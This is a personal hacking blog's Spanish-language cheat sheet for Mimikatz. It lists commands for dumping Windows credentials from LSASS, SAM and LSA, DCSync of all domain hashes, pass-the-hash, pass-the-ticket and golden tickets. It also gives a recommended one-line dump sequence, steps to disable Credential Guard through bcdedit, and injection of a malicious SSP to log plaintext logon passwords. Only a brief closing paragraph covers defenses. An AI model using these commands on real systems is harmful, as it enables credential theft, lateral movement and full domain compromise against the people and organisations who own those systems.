Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

Mimikatz

Comandos básicos

privilege::debug

token::elevate

version

Dumpear creds

sekurlsa::logonpasswords

sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:NTHASH /run:COMMAND

lsadump::sam

lsadump::lsa /patch

lsadump::dcsync /user:USERNAME

lsadump::dcsync /all /csv

Intentar habilitar WDigest para almacenar credenciales en texto plano

Kerberos

kerberos::list /export

kerberos::ptt FILE.kirbi

kerberos::golden

Seguidilla de comandos al conseguir mimikatz recomendada

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache""sekurlsa::ekeys" "exit"

Windows Credential Guard

Windows Credential Guard es una característica de seguridad introducida por Microsoft para proteger credenciales sensibles almacenadas en memoria. Cuando está habilitada, el proceso LSASS (Local Security Authority Subsystem Service) utiliza un entorno aislado llamado LSAISO.exe (LSA Isolated) que opera en un nivel de confianza superior (VTL1) al del sistema operativo normal (VTL0). Esto significa que incluso con privilegios de SYSTEM, no se puede acceder directamente a las credenciales protegidas.

Limitaciones de Mimikatz con Credential Guard

Deshabilitar Credential Guard

Para deshabilitar Credential Guard y permitir que Mimikatz acceda a las credenciales en memoria:

  1. Ejecutar bcdedit /set hypervisorlaunchtype off para deshabilitar el Hypervisor.
  2. Reiniciar el sistema.

Alternativa: Captura de credenciales en texto plano

Si no es posible deshabilitar Credential Guard, se puede usar el módulo misc::memssp de Mimikatz para interceptar credenciales en texto plano durante el inicio de sesión:

  1. Inyectar el SSP malicioso con misc::memssp.
  2. Esperar a que un usuario inicie sesión en el sistema.
  3. Revisar el archivo de registro generado en C:\Windows\System32\mimilsa.log para obtener las credenciales capturadas.

Consideraciones finales

Credential Guard es una mitigación efectiva contra ataques basados en credenciales, pero no es infalible. Los atacantes pueden recurrir a técnicas como la inyección de SSP para capturar credenciales en texto plano durante el inicio de sesión. Es importante implementar medidas adicionales, como el uso de autenticación multifactor y la segmentación de redes, para reducir el riesgo de compromisos.